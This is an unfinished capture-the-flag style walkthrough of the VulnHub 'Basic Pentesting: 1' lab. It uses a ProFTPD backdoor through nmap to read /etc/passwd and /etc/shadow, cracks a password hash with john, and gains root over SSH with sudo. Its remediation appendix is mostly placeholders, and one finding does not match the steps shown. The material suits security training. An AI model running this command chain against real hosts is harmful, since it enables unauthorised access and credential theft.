Basic Pentesting: 1 - Boot-to-Root Walkthrough

Objective

Explore multiple remote vulnerabilities and multiple privilege escalation vectors to gain access to and gain root privileges on the target host.

Source: [VulnHub.com]

Status: [Work in progress]

Methodology

Discovery

# Nmap 7.60 scan initiated Tue Apr  3 07:31:41 2018 as: nmap -O -sT -sV -p- -T5 -oN nmap.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00088s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  3 07:32:08 2018 -- 1 IP address (1 host up) scanned in 26.77 seconds

Port 21 / ProFTPD 1.3.3c looks interesting - ProFTPd1.3 is known to be prone to RCE so let's go for the low hanging fruit first

Entry Point #1 - Port 21 (FTP)

Tools: nmap 

# Nmap 7.60 scan initiated Tue Apr  3 07:33:26 2018 as: nmap -p 21 --script ftp* -oN nmap_ftp.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 8420 guesses in 608 seconds, average tps: 13.5
| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

# Nmap done at Tue Apr  3 07:43:48 2018 -- 1 IP address (1 host up) scanned in 621.71 seconds

Voila! We can haz root! Let's try the exploit 

root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/passwd' -p 21 192.168.56.102 |grep "/bin/bash"
|   Results: root:x:0:0:root:/root:/bin/bash
|   marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/shadow' -p 21 192.168.56.102 |grep -E "(root|marlinspike)"
|   Results: root:!:17484:0:99999:7:::
|   marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
root@kali:~/Desktop/Basic_Pentesting_1# echo "marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/" > john.txt
root@kali:~/Desktop/Basic_Pentesting_1# john john.txt 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-04-03 08:08) 7.142g/s 57.14p/s 57.14c/s 57.14C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/Basic_Pentesting_1# ssh marlinspike@vtcsec
The authenticity of host 'vtcsec (192.168.56.102)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'vtcsec,192.168.56.102' (ECDSA) to the list of known hosts.
marlinspike@vtcsec's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
......
marlinspike@vtcsec:~$
marlinspike@vtcsec:~$ sudo -l
[sudo] password for marlinspike: 
Matching Defaults entries for marlinspike on vtcsec:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marlinspike may run the following commands on vtcsec:
    (ALL : ALL) ALL

marlinspike@vtcsec:~$ sudo su -
root@vtcsec:~#

We have root!

Entry Point #2 - Port 80 (HTTP)

Tools: nmap, nc 

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.56.103
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb 
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. 
+ OPTIONS Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ GET Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: GET /secret/: This might be interesting...
+ OSVDB-3233: GET /icons/README: Apache default file found.


Two things pop right away:

  • Possible Wordpress installation
  • 'vtcsec' hostname

<< to be continued >>

Recommendations

Appendix A: Vulnerability Detail and Mitigation

Unpatched Software Components
Rating High
Description xxxxxx
Impact xxxxx
Remediation xxxxx
Relaxed sudo Roles
Rating High
Description xxxxxx
Impact xxxxx
Remediation xxxxx
Default Weak Passwords
Rating High
Description xxxxxx
Impact xxxxx
Remediation xxxxx
Relaxed Filesystem Permissions
Rating High
Description Unix file permissions for /etc/shadow are incorrect.
Impact Allow any user with a shell to access this file and extract password hashes which can be further passed to a password cracking utility to extract user credentials.
Remediation Set unix file permissions for /etc/shadow to "600" and change ownership to root:root
Retrieved from "https://blaksec.com/index.php?title=Basic_Pentesting:_1_-_Boot-to-Root_Walkthrough&oldid=270"